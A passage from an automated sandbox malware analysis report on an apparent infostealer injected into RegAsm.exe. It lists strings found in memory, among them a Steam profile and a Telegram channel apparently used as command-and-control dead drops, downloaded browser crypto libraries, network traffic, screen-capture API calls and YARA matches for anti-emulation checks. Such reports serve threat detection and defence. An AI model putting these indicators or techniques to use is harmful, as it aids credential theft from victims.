                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.j
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                  Source: JEGHDA.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: JEGHDA.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: JEGHDA.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://help.steampowered.com/en/
                  Source: IIDHJD.3.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: https://mozilla.org0/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.co
                  Source: 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/discussions/
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login
                  Source: 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199686524322
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/market/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                  Source: file.exe, 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199686524322
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199686524322/badges
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199686524322/inventory/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/workshop/
                  Source: 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/
                  Source: 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/about/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/explore/
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/legal/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/mobile
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/news/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/points/shop/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/stats/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                  Source: GCBFBG.3.drString found in binary or memory: https://support.mozilla.org
                  Source: GCBFBG.3.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: GCBFBG.3.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp, GDAAKF.3.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: GDAAKF.3.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp, GDAAKF.3.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: GDAAKF.3.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                  Source: file.exe, 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/k0mono
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: JEGHDA.3.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                  Source: JEGHDA.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: GCBFBG.3.drString found in binary or memory: https://www.mozilla.org
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/:
                  Source: GCBFBG.3.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                  Source: GCBFBG.3.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                  Source: GCBFBG.3.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                  Source: GCBFBG.3.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                  Source: GCBFBG.3.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownHTTPS traffic detected: 23.194.234.100:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004112FD _EH_prolog,memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,3_2_004112FD

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 0.2.file.exe.70aac0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 0.2.file.exe.70aac0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 0.2.file.exe.6e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6EED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,3_2_6C6EED10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C72B8C0 rand_s,NtQueryVirtualMemory,3_2_6C72B8C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C72B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,3_2_6C72B910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C72B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,3_2_6C72B700
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6CF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,3_2_6C6CF280
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F736A0_2_006F736A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041C07A3_2_0041C07A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041E1903_2_0041E190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041BB293_2_0041BB29
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041CCA73_2_0041CCA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6C35A03_2_6C6C35A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C705C103_2_6C705C10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C712C103_2_6C712C10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C73AC003_2_6C73AC00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C706CF03_2_6C706CF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6D6C803_2_6C6D6C80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6DFD003_2_6C6DFD00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6EED103_2_6C6EED10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C700DD03_2_6C700DD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C736E633_2_6C736E63
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C703E503_2_6C703E50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E9E503_2_6C6E9E50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C712E4E3_2_6C712E4E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C729E303_2_6C729E30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C707E103_2_6C707E10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6CBEF03_2_6C6CBEF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6DFEF03_2_6C6DFEF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C724EA03_2_6C724EA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E5E903_2_6C6E5E90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6D9F003_2_6C6D9F00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6CDFE03_2_6C6CDFE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6F6FF03_2_6C6F6FF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E88503_2_6C6E8850
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6ED8503_2_6C6ED850
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C70B8203_2_6C70B820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7148203_2_6C714820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6D78103_2_6C6D7810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7058E03_2_6C7058E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C71B9703_2_6C71B970
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6DD9603_2_6C6DD960
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6EA9403_2_6C6EA940
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6CC9A03_2_6C6CC9A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6FD9B03_2_6C6FD9B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7229903_2_6C722990
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C709A603_2_6C709A60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E1AF03_2_6C6E1AF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C708AC03_2_6C708AC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C732AB03_2_6C732AB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6F4AA03_2_6C6F4AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6DCAB03_2_6C6DCAB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C73BA903_2_6C73BA90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6D54403_2_6C6D5440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C73545C3_2_6C73545C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C73542B3_2_6C73542B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6CD4E03_2_6C6CD4E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6D64C03_2_6C6D64C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6ED4D03_2_6C6ED4D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7234A03_2_6C7234A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C72C4A03_2_6C72C4A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6F05123_2_6C6F0512
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7285F03_2_6C7285F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6CC6703_2_6C6CC670
